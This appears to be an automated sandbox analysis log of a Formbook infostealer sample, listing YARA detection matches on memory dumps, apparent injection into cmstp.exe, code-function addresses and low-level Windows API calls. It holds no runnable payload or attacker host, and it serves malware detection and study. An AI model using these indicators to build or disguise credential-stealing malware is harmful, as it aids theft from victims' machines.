          Source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.drOLE indicator application name: unknown
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 4_2_0006A2A94_2_0006A2A9
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 4_2_003458F04_2_003458F0
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 4_2_003458E64_2_003458E6
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 4_2_0006A0354_2_0006A035
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_0006A2A95_2_0006A2A9
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_004010305_2_00401030
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_0041C0BF5_2_0041C0BF
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_0041C94E5_2_0041C94E
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_0041B9B45_2_0041B9B4
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_0041D22F5_2_0041D22F
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_0041C3455_2_0041C345
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_0041D3595_2_0041D359
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00408C6B5_2_00408C6B
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00408C705_2_00408C70
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_0041C5595_2_0041C559
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00402D905_2_00402D90
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00402FB05_2_00402FB0
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00ABE0C65_2_00ABE0C6
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AED0055_2_00AED005
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B3D06D5_2_00B3D06D
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AC30405_2_00AC3040
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AD905A5_2_00AD905A
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00ABE2E95_2_00ABE2E9
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B612385_2_00B61238
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B663BF5_2_00B663BF
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00ABF3CF5_2_00ABF3CF
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AE63DB5_2_00AE63DB
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AC23055_2_00AC2305
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B0A37B5_2_00B0A37B
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AC73535_2_00AC7353
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AD14895_2_00AD1489
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AF54855_2_00AF5485
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B4443E5_2_00B4443E
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AFD47D5_2_00AFD47D
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B405E35_2_00B405E3
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00ADC5F05_2_00ADC5F0
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AC351F5_2_00AC351F
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B065405_2_00B06540
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AC46805_2_00AC4680
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00ACE6C15_2_00ACE6C1
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B0A6345_2_00B0A634
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B626225_2_00B62622
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00ACC7BC5_2_00ACC7BC
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B4579A5_2_00B4579A
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AF57C35_2_00AF57C3
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B5F8EE5_2_00B5F8EE
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B3F8C45_2_00B3F8C4
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AE286D5_2_00AE286D
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00ACC85C5_2_00ACC85C
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AC29B25_2_00AC29B2
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B6098E5_2_00B6098E
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AD69FE5_2_00AD69FE
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B459555_2_00B45955
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B4394B5_2_00B4394B
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B73A835_2_00B73A83
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B6CBA45_2_00B6CBA4
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B4DBDA5_2_00B4DBDA
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00ABFBD75_2_00ABFBD7
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AE7B005_2_00AE7B00
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B5FDDD5_2_00B5FDDD
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AF0D3B5_2_00AF0D3B
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00ACCD5B5_2_00ACCD5B
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AF2E2F5_2_00AF2E2F
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00ADEE4C5_2_00ADEE4C
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B5CFB15_2_00B5CFB1
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B32FDC5_2_00B32FDC
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AD0F3F5_2_00AD0F3F
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AEDF7C5_2_00AEDF7C
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00146F065_2_00146F06
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_001408FB5_2_001408FB
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_001409025_2_00140902
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_001432FF5_2_001432FF
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_001433025_2_00143302
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_001413595_2_00141359
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_001413625_2_00141362
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00147D025_2_00147D02
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_001457B25_2_001457B2
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_0006A0355_2_0006A035
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020C12387_2_020C1238
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0201E2E97_2_0201E2E9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020223057_2_02022305
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020273537_2_02027353
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0206A37B7_2_0206A37B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020C63BF7_2_020C63BF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0201F3CF7_2_0201F3CF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020463DB7_2_020463DB
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0204D0057_2_0204D005
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020230407_2_02023040
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0203905A7_2_0203905A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0209D06D7_2_0209D06D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0201E0C67_2_0201E0C6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020C26227_2_020C2622
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0206A6347_2_0206A634
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020246807_2_02024680
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0202E6C17_2_0202E6C1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020A579A7_2_020A579A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0202C7BC7_2_0202C7BC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020557C37_2_020557C3
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020A443E7_2_020A443E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0205D47D7_2_0205D47D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020554857_2_02055485
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020314897_2_02031489
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0202351F7_2_0202351F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020665407_2_02066540
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020A05E37_2_020A05E3
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0203C5F07_2_0203C5F0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020D3A837_2_020D3A83
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02047B007_2_02047B00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020CCBA47_2_020CCBA4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020ADBDA7_2_020ADBDA
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0201FBD77_2_0201FBD7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0202C85C7_2_0202C85C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0204286D7_2_0204286D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0209F8C47_2_0209F8C4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020BF8EE7_2_020BF8EE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020A394B7_2_020A394B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020A59557_2_020A5955
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020C098E7_2_020C098E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020229B27_2_020229B2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020369FE7_2_020369FE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02052E2F7_2_02052E2F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0203EE4C7_2_0203EE4C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02030F3F7_2_02030F3F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0204DF7C7_2_0204DF7C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020BCFB17_2_020BCFB1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02092FDC7_2_02092FDC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02050D3B7_2_02050D3B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0202CD5B7_2_0202CD5B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020BFDDD7_2_020BFDDD
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000AD22F7_2_000AD22F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000AC94E7_2_000AC94E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_00098C6B7_2_00098C6B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_00098C707_2_00098C70
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_00092D907_2_00092D90
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_00092FB07_2_00092FB0
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: String function: 00ABE2A8 appears 38 times
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: String function: 00B2F970 appears 84 times
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: String function: 00B03F92 appears 132 times
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: String function: 00ABDF5C appears 121 times
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: String function: 00B0373B appears 245 times
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 0208F970 appears 84 times
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 0201DF5C appears 121 times
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 0206373B appears 245 times
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 02063F92 appears 132 times
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 0201E2A8 appears 38 times
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_004185D0 NtCreateFile,5_2_004185D0
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00418680 NtReadFile,5_2_00418680
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00418700 NtClose,5_2_00418700
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_004187B0 NtAllocateVirtualMemory,5_2_004187B0
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_004185CA NtCreateFile,5_2_004185CA
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_004186FA NtClose,5_2_004186FA
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_004187AA NtAllocateVirtualMemory,5_2_004187AA
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AB00C4 NtCreateFile,LdrInitializeThunk,5_2_00AB00C4
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AB0078 NtResumeThread,LdrInitializeThunk,5_2_00AB0078
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AB0048 NtProtectVirtualMemory,LdrInitializeThunk,5_2_00AB0048
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AB07AC NtCreateMutant,LdrInitializeThunk,5_2_00AB07AC
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAF9F0 NtClose,LdrInitializeThunk,5_2_00AAF9F0
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAF900 NtReadFile,LdrInitializeThunk,5_2_00AAF900
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFAE8 NtQueryInformationProcess,LdrInitializeThunk,5_2_00AAFAE8
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_00AAFAD0
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFBB8 NtQueryInformationToken,LdrInitializeThunk,5_2_00AAFBB8
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFB68 NtFreeVirtualMemory,LdrInitializeThunk,5_2_00AAFB68
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFC90 NtUnmapViewOfSection,LdrInitializeThunk,5_2_00AAFC90
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFC60 NtMapViewOfSection,LdrInitializeThunk,5_2_00AAFC60
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFD8C NtDelayExecution,LdrInitializeThunk,5_2_00AAFD8C
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFDC0 NtQuerySystemInformation,LdrInitializeThunk,5_2_00AAFDC0
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFEA0 NtReadVirtualMemory,LdrInitializeThunk,5_2_00AAFEA0
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_00AAFED0
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFFB4 NtCreateSection,LdrInitializeThunk,5_2_00AAFFB4
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AB10D0 NtOpenProcessToken,5_2_00AB10D0
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AB0060 NtQuerySection,5_2_00AB0060
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AB01D4 NtSetValueKey,5_2_00AB01D4
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AB010C NtOpenDirectoryObject,5_2_00AB010C
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AB1148 NtOpenThread,5_2_00AB1148
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAF8CC NtWaitForSingleObject,5_2_00AAF8CC
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAF938 NtWriteFile,5_2_00AAF938
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AB1930 NtSetContextThread,5_2_00AB1930
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFAB8 NtQueryValueKey,5_2_00AAFAB8
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFA20 NtQueryInformationFile,5_2_00AAFA20
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFA50 NtEnumerateValueKey,5_2_00AAFA50
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFBE8 NtQueryVirtualMemory,5_2_00AAFBE8
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFB50 NtCreateKey,5_2_00AAFB50
